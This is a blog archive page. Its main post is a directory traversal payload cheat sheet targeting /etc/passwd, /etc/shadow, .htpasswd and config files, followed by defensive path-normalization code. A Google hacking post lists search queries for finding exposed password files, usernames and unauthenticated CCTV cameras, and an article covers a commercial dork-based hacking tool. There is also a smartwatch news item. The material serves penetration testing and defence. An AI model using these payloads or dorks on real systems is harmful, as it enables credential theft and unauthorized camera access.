
Monday, 25 May 2015

Directory Traversal Attack Cheat Sheet for Application Penetration Test

 

Are attackers dot-dot-slashing their way into your data?
About as simple to fix as they are to exploit, directory traversal vulnerabilities remain a persistent threat in application environments. Yet many developers, and even security teams, are unaware that they can let an attacker learn how a system is organized, read sensitive files on the application server, or use that access as a springboard for further attacks on the server or the rest of the network.

According to Imperva's most recent "Web Application Attack Report," released last month, directory traversal attacks against retail Web applications made up 31 percent of the attacks when compared among the eight most prevalent attack types, and they made up 36 percent of attacks against all other industries' Web apps. In retail, that number lagged behind a whopping 53 percent for SQL injection attacks, but in other verticals it even led SQLi, which made up only 27 percent of attacks. Meanwhile, in its Superfecta attack statistics released last month, secure hosting firm FireHost reported that among the four major attack types it commonly blocks -- XSS, directory traversal, cross-site request forgery, and SQL injection -- directory traversal ranked second behind XSS, making up 23 percent of the 9.8 million attacks blocked from these four categories by its IP Reputation Management system.

Below I have attached the most important directory traversal payloads, as a cheat sheet for info-sec auditors and developers.

/etc/master.passwd
/master.passwd
etc/passwd
etc/shadow
/etc/passwd
../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../../etc/shadow
———————————————————————————————————————————-
../../../../../../etc/passwd&=%3C%3C%3C%3C
../../../administrator/inbox
../../../../../../../dev
———————————————————————————————————————————-
.htpasswd
passwd
passwd.dat
pass.dat
.htpasswd
/.htpasswd
../.htpasswd
.passwd
/.passwd
../.passwd
.pass
../.pass
members/.htpasswd
member/.htpasswd
user/.htpasswd
users/.htpasswd
root/.htpasswd
———————————————————————————————————————————-
db.php
data.php
database.asp
database.js
database.php
dbase.php
admin/access_log
../users.db.php
users.db.php
———————————————————————————————————————————-
/core/config.php
config.php
config.js
../config.js
config.asp
../config.asp
_config.php
../_config.php
../config.php
config.inc.php
../config.inc.php
/config.asp
../config.asp
/../../../../pswd
/admin/install.php
../install.php
install.php
———————————————————————————————————————————-
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow
..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd
..%2F..%2F..%2F%2F..%2F..%2Fetc/shadow
..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
———————————————————————————————————————————-
/..\..\..\..\..\..\winnt\win.ini
../../windows/win.ini
..//..//..//..//..//boot.ini
..\../..\../boot.ini
..\../..\../..\../..\../boot.ini
\.....\\\.....\\\.....\\\
= "/.." . "%2f..
d:\AppServ\MySQL
c:\AppServ\MySQL
c:WINDOWS/system32/
/C:\Program Files\
/D:\Program Files\
/C:/inetpub/ftproot/
———————————————————————————————————————————-
/boot/grub/grub.conf
/proc/interrupts
/proc/cpuinfo
/proc/meminfo
———————————————————————————————————————————-
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/acces.log
../../../../../../../etc/httpd/logs/error_log
../../../../../../../etc/httpd/logs/error.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../../../usr/local/apache/logs/access_log
../../../../../../../usr/local/apache/logs/access.log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
../../../../../../../var/www/logs/error_log
../../../../../../../var/www/logs/error.log
../../../../../../../usr/local/apache/logs/error_log
../../../../../../../usr/local/apache/logs/error.log
../../../../../../../var/log/apache/error_log
../../../../../../../var/log/apache2/error_log
../../../../../../../var/log/apache/error.log
../../../../../../../var/log/apache2/error.log
../../../../../../../var/log/error_log
../../../../../../../var/log/error.log
———————————————————————————————————————————-
/etc/init.d/apache
/etc/init.d/apache2
/etc/httpd/httpd.conf
/etc/apache/apache.conf
/etc/apache/httpd.conf
/etc/apache2/apache2.conf
/etc/apache2/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache/conf/httpd.conf
/opt/apache/conf/httpd.conf
/home/apache/httpd.conf
/home/apache/conf/httpd.conf
/etc/apache2/sites-available/default
/etc/apache2/vhosts.d/default_vhost.include
———————————————————————————————————————————-
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
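The defensive counterpart to the list above, as an added example (not part of the original cheat sheet): a file-serving endpoint should reduce every request path to one plain form before any policy check, so that the percent-encoded, double-encoded, overlong-UTF-8 and backslash variants listed here all collapse to the same thing, and should join the user path under its document root in a way that cannot escape it. The sample paths and the `/srv/www/static` root are constructed for the demonstration.

```python
import os
import re
from urllib.parse import unquote_to_bytes

# Overlong UTF-8 forms of '.', '/' and '\' that naive decoders let through;
# the /%c0%ae%c0%ae/ payload in the sheet above relies on the first one.
_OVERLONG = {b"\xc0\xae": b".", b"\xc0\xaf": b"/", b"\xc1\x9c": b"\\"}

def canonicalize(raw: str, max_rounds: int = 3) -> str:
    """One plain form for a request path: bounded repeated percent-decoding
    (so %252e%252e%252f collapses), overlong bytes mapped to ASCII,
    backslashes turned into slashes, runs of slashes squeezed."""
    data = raw.encode("utf-8")
    for _ in range(max_rounds):
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data = decoded
    for seq, plain in _OVERLONG.items():
        data = data.replace(seq, plain)
    text = data.decode("utf-8", "replace").replace("\\", "/")
    return re.sub(r"/+", "/", text)

def is_traversal(raw: str) -> bool:
    """True if the canonical path ever climbs above where it started
    (images/../logo.png is fine, ../../etc/passwd is not)."""
    depth = 0
    for seg in canonicalize(raw).split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg not in ("", "."):
            depth += 1
    return False

def safe_join(base_dir: str, user_path: str):
    """Map a user path under base_dir, or None if it escapes. Joined as a
    relative path (a leading slash makes os.path.join drop base_dir) and
    checked with realpath so a symlink cannot carry it back out."""
    rel = canonicalize(user_path).lstrip("/")
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, rel))
    return target if os.path.commonpath([base, target]) == base else None

# Constructed request paths modelled on the encodings in the cheat sheet
SAMPLES = [
    "../../../../etc/passwd",
    "..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd",
    "..%5c..%5c..%5c/boot.ini",
    "/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd",
    "%252e%252e%252fetc%252fshadow",
    "images/../logo.png",
]

def report(paths=SAMPLES):
    """Return {raw path: (canonical form, flagged?)} for a batch of requests."""
    return {p: (canonicalize(p), is_traversal(p)) for p in paths}

if __name__ == "__main__":
    for raw, (canon, flagged) in report().items():
        print("TRAVERSAL" if flagged else "ok       ", repr(raw), "->", canon)
```

Note that a plain string match on `../` would miss four of the six samples; the canonical form is what the policy must look at.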

Thursday, 5 September 2013

Pranav Mistry: Samsung Galaxy Gear smartwatch is packed with technologies from the next decade

Pranav Mistry, head of the think tank team at Samsung Research America, points to the so-called 'Memographer' camera on a Samsung Galaxy Gear smartwatch during its launch at the 'Samsung UNPACKED 2013 Episode 2' at the IFA consumer electronics fair in Berlin, September 4, 2013. The IFA consumer electronics and home appliances fair will open its doors to the public from September 6 till 11 in the German capital. (REUTERS)

BERLIN: Samsung Electronics unveiled its highly anticipated digital wristwatch that can snap photos, track workouts and use an array of apps - gadgetry that the company hopes will catapult it into a market of smart portable devices that leave cellphones in users' pockets.

Named the Samsung Galaxy Gear, the so-called smartwatch will join Google Glass as the latest example of wearable technology. The watch is synced to a cellphone, allowing users to answer calls and receive text messages from their wrists. The timing of the release could also give Samsung a leg up over Apple, which has yet to unveil a similar device but has long been rumored to be working on one.

At a much-hyped unveiling ceremony ahead of Berlin's Internationale Funkausstellung, one of the world's largest trade shows for consumer electronics, Samsung's head of mobile communications, JK Shin, introduced the device by pretending to receive a text message on stage.

"Don't forget to mention Android," Shin's message read.

He then raised his left arm, exposing the watch to applause from both the Berlin crowd and people in Times Square in New York, who were patched into the event via a video stream. Like other smartphones and tablets Samsung produces, Gear runs on Google's Android operating system.

From the Gear's small screen, which measures 1.63 inches diagonally, users can also receive emails, share pictures and use apps designed for Gear. It does not, however, function as a stand-alone device and must be paired with a Samsung phone or tablet.

Pranav Mistry, the head of research at Samsung Research America, said the watch was "packed with technologies from the next decade."

The watch has a rubbery wristband in which a small 1.9-megapixel camera is embedded. Its display surface has stainless steel bezels with four visible screws in each corner.

The watch is activated by pressing a button on the outer right side of the display or aiming the wristband lens at an object. A gentle swipe downward quickly turns on the camera, a feature Samsung calls the "Memographer."

"This is a feature that changes the way we interact, the way we express and the way we capture," Mistry said.

From the home screen, swiping upward brings up a number pad where a user can make a call. Because a gyroscope and accelerometer detect the Gear's movement, a user can answer calls by lifting his wrist to his ear.

"We have uniquely positioned the speakers and microphones so you can talk as you would on a regular phone," Mistry said.

The Gear is set to be released worldwide next month, although neither Shin nor Mistry gave a date. Also under wraps was the cost, something many believe could be a determining factor in whether the next-generation technology hits home with consumers who have historically been reluctant to adopt such "wearables of tomorrow," as Mistry called the Gear.

Samsung, which overtook Apple last year as the world's largest producer of smartphones, got into the watch business in 1999 with a model that consumers shunned.

Galaxy Gear has 512 megabytes of RAM and an internal memory of four gigabytes. It has an 800-megahertz, single-core central processing unit and weighs 2.6 ounces. Available colors include lime green, oatmeal beige, wild orange, mocha gray, jet black and rose gold.

Friday, 30 August 2013

 
Robots.txt is a text (not HTML) file you put on your site to tell search engines which pages you would like them not to visit. Robots.txt is by no means mandatory for search engines, but generally search engines obey what they are asked not to do.
 
If it is not configured properly, there is a good chance that a hacker finds exploitable targets and sensitive data by using search engines, a technique known as Google Hacking. The Google Hacking Database (GHDB) is a database of queries that identify sensitive data. Although Google blocks some of the better-known Google hacking queries, nothing stops a hacker from crawling your site and running the Google Hacking Database queries directly against the crawled content.
 
Information that the Google Hacking Database identifies:
 
 * Files containing passwords
 * Files containing usernames
 * Advisories and server vulnerabilities
 * Error messages that contain sensitive information
 * Sensitive directories
 * Vulnerable servers
 * Web server detection
 * Control of CCTV Cameras

 
I am planning to completely update this GHDB soon, so you can refer to this post to find the latest attack patterns.


GHDB: Files containing passwords

This search shows "password" files which contain encrypted/hashed/cleartext passwords. A password cracker can decrypt the encrypted/hashed password faster than Elvis eating jelly doughnuts. Sometimes you will get FULL ADMIN access...

1. inurl:"/root/etc/passwd" intext:"home/*:"
2. intitle:index.of passwd passwd.bak
3. intitle:index.of master.passwd
4. intitle:"Index of" pwd.db
5. intitle:"Index of" ".htpasswd" htpasswd.bak
6. intitle:"Index of" ".htpasswd" "htgroup" -intitle:"dist" -apache -htpasswd.c
7. intitle:"Index of" spwd.db passwd -pam.conf
8. intitle:"Index of..etc" passwd
9. intitle:index.of config.php
10. index.of passlist
11. intitle:index.of administrators.pwd
12. filetype:sql insite:pass && user


GHDB: Files containing usernames

This search reveals user lists and usernames of different types of user, such as end-user accounts and administrative accounts.

1. inurl:admin inurl:userlist
2. inurl:admin filetype:asp inurl:userlist
3. filetype:reg reg HKEY_CURRENT_USER username
4. filetype:conf inurl:proftpd.conf -sample
5. inurl:php inurl:hlstats intext:"Server Username"
6. intext:"SteamUserPassphrase=" intext:"SteamAppUser=" -"username" -"user"
7. filetype:log username putty


GHDB: Control of CCTV Cameras

This search reveals web cameras. If authentication is not enabled, then you can take control of the web cameras.

1. inurl:/control/userimage.html
2. intitle:"active webcam page"
3. inurl:camctrl.cgi
4. allintitle:Brains, Corp. camera
5. intitle:"supervisioncam protocol"
6. allinurl:index.htm?cus?audio
7. intitle:"Browser Launch Page"
8. inurl:"next_file=main_fs.htm" inurl:img inurl:image.cgi
9. intitle:"Live NetSnap Cam-Server feed"
10. intitle:"iVISTA.Main.Page"
11. intitle:"V-Gear BEE"
12. intitle:"EvoCam" inurl:"webcam.html"
13. intitle:"i-Catcher Console" Copyright "iCode Systems"
14. intitle:"toshiba network camera - User Login"
15. intitle:"DVR Web client"
16. inurl:netw_tcp.shtml
17. camera linksys inurl:main.cgi

Friday, 10 May 2013

Hacking with new DIY Google Dorks based hacking tool

A new version of the DIY Google Dorks based hacking tool has been released; it is an extremely useful tool for reconnaissance of targets.

A Webroot blog post announced that a new version of the DIY Google Dorks based hacking tool has been released in the wild. It can be used for mass website analysis: the power of the popular search engine is exploited for information gathering during the reconnaissance phase of an attack. Similar tools can be used to acquire information on target environments, whether by an attacker or by a pen tester evaluating the architecture that is about to be tested.

The availability of the DIY Google Dorks based hacking tool lets the ill-intentioned acquire precious information on remotely exploitable websites, data that can then be used to compromise them, for example by deploying a malicious exploit kit or by exploiting known vulnerabilities. The tool relies on Google Dorks to evaluate a target; in particular, it has built-in features to evaluate the possibility of performing a SQL injection attack, or to discover all the targets that aren't protected by a CAPTCHA challenge mechanism. As usual the project appears to be under continuous development, and the authors are still working to improve its capabilities with new features, such as evaluating the vulnerability to custom malicious exploits.

By composing specifically crafted queries in Google it is possible to reveal sensitive information essential for the success of an attack. Thanks to the advanced operators (the "dorking"), a huge quantity of information can be retrieved on a target, such as:
  • User’s credentials.
  • Sensitive documents.
  • Admin login page.
  • Email lists.
The syntax for using an advanced operator in Google is
operator_name:keyword
Some sample keywords/advanced operators:
allintext - searches for occurrences of all the keywords given
intext - searches for occurrences of the keywords, all at once or one at a time
inurl - searches for a URL matching one of the keywords
allinurl - searches for a URL matching all the keywords in the query
intitle - searches for occurrences of the keywords in the page title, all or one
allintitle - searches for occurrences of all the keywords in the page title at a time
site - restricts the search to that particular site and lists all the results for it
filetype - searches for the particular file type mentioned in the query
link - searches for external links to pages
numrange - used to locate specific numbers in your searches
daterange - used to search within a particular date range
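The earlier GHDB post on this page notes that nothing stops someone from running the database's queries against a crawl of your site; the site owner can run them first. The following Python is an added example, not code from the original posts or from any GHDB tooling: a small evaluator for the operator syntax listed above (inurl, intitle, intext, their all* forms, site, filetype, quoted phrases and "-" negation) run over constructed crawl records, so exposed listings show up before a stranger finds them. The matching rules are a simplified assumption of how Google treats these operators, and the hosts are invented.

```python
import re
from urllib.parse import urlparse

# Constructed crawl records (URL, <title>, visible text) standing in for the
# output of a crawler run against your own site; none of these hosts exist.
CRAWL = [
    {"url": "https://intranet.example.test/backup/passwd.bak",
     "title": "Index of /backup", "text": "passwd passwd.bak shadow.old"},
    {"url": "https://www.example.test/docs/setup.pdf",
     "title": "Setup guide", "text": "Installation steps"},
    {"url": "https://www.example.test/admin/userlist.asp",
     "title": "User list", "text": "alice bob carol"},
    {"url": "https://cam.example.test/view/index.shtml",
     "title": "Live NetSnap Cam-Server feed", "text": "login"},
]

# one term: optional '-', optional operator:, then "quoted phrase" or a bare word
_TOKEN = re.compile(r'(-?)(?:(\w+):)?(?:"([^"]*)"|(\S+))')

def parse_dork(query):
    """Split a dork into (negated, operator, term) triples. An all* operator
    (allintitle, allinurl, allintext) is sticky for every following term, a
    plain operator binds only its own term, and a bare term has operator None."""
    terms, sticky = [], None
    for neg, op, quoted, bare in _TOKEN.findall(query):
        op = (op or sticky or "").lower() or None
        if op and op.startswith("all"):
            sticky = op = op[3:]
        terms.append((neg == "-", op, quoted or bare))
    return terms

def _term_re(term):
    # Google treats punctuation loosely, so index.of must also hit "Index of"
    return re.compile(re.escape(term).replace(r"\.", r"[.\s]"), re.I)

def _field(rec, op):
    if op in ("inurl", "intitle", "intext"):
        return rec[{"inurl": "url", "intitle": "title", "intext": "text"}[op]]
    return " ".join((rec["url"], rec["title"], rec["text"]))  # bare term

def matches(rec, query):
    """True if every term of the dork holds for this record (negated ones fail)."""
    host = (urlparse(rec["url"]).hostname or "").lower()
    path = urlparse(rec["url"]).path.lower()
    for neg, op, term in parse_dork(query):
        if op == "site":
            hit = host == term.lower() or host.endswith("." + term.lower())
        elif op == "filetype":
            hit = path.endswith("." + term.lower())
        else:
            hit = bool(_term_re(term).search(_field(rec, op)))
        if hit == neg:
            return False
    return True

def run_dorks(records, queries):
    """{query: [matching urls]}: what the GHDB would surface from this crawl."""
    return {q: [r["url"] for r in records if matches(r, q)] for q in queries}

if __name__ == "__main__":
    for q, hits in run_dorks(CRAWL, ["intitle:index.of passwd passwd.bak",
                                     "inurl:admin inurl:userlist"]).items():
        print(q, "->", hits or "no exposure")
```

Any URL this returns is a finding to fix (remove the listing, add authentication), not merely to hide with robots.txt.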
Using more complex queries an attacker can obtain a series of facts about the status of the target, for example whether it has already been "backdoored", and can discover which vulnerabilities can potentially affect the system. The Google Hacking Database provides various examples of queries that help find vulnerable servers, gain information on the target, explore sensitive directories for vulnerable files, find password files or find sensitive online shopping information.
  • inurl:"r00t.php" – This dork finds websites that were hacked and backdoored and that contain their system information.
  • allintext:"fs-admin.php" – A foothold using allintext:"fs-admin.php" shows the world-readable directories of a plug-in that enables WordPress to be used as a forum. Many of the results of the search also show error logs which give an attacker the server-side paths, including the home directory name. This name is often also used for the login to FTP and shell access, which exposes the system to attack. There is also an undisclosed flaw in version 1.3 of the software, as the author mentions a security fix in version 1.4 but does not tell us what was patched.
  • filetype:config inurl:web.config inurl:ftp – This Google dork finds sensitive information about MySQL Server, the "uid" and "password", in web.config files exposed through FTP.
The above dorks are just simple examples of the power of these search strings; after just 10 minutes of playing with them a user perceives the infinite possibilities that Google provides to an attacker. Now imagine a single DIY Google Dorks based hacking tool that automates all these queries, without requiring any particular knowledge of Google dorks... it's a hacker's heaven; what do you think about it? The DIY Google Dorks based hacking tool described by Dancho Danchev offers a complete suite to automate the remote inspection of targets and their exploitation; the instrument works on the desktop and can also be integrated with popular browsers to fool the search engines into thinking that the generated traffic is legitimate.
The price of the DIY Google Dorks based hacking tool is very cheap compared to the advantage deriving from its use: one license costs $10 paid in the Liberty Reserve currency, or $11 paid by Western Union transfer. Licenses are linked to a specific host through a hardware-based ID restriction, but the authors also offer an unlimited license for $20 in Liberty Reserve, or $20 by Western Union transfer.
Cyber criminals can exploit hundreds of thousands of legitimate websites in various ways, and tools such as the DIY Google Dorks based hacking tool facilitate such attacks. Dancho Danchev, in his interesting post, described the principal techniques used to compromise websites:
  • Use of search engine reconnaissance through DIY SQL/RFI (Remote File Inclusion) tools or botnets; the category includes a wide range of applications that automatically exploit improperly configured websites such as blogging platforms or well-known CMSs.
  • Use of data-mined or purchased stolen accounting data; cyber criminals gather information from malware-infected machines, looking for login credentials that are then automatically abused, with malicious scripts and actual executables getting hosted on legitimate websites in an attempt to trick a security solution's IP reputation process.
  • Active exploitation of server farms: criminals try to infect as many low-profile websites as possible; a common practice observed by security researchers is the exploitation of servers that host a large number of domains, for example using commercially available Apache backdoors.
The cybercrime underground offers everything needed to organize a fraud without any particular knowledge of the various technological platforms (e.g. mobile), and proposes new, efficient sales models such as FaaS... it is crucial to follow the evolution of the black market to avoid shocking surprises.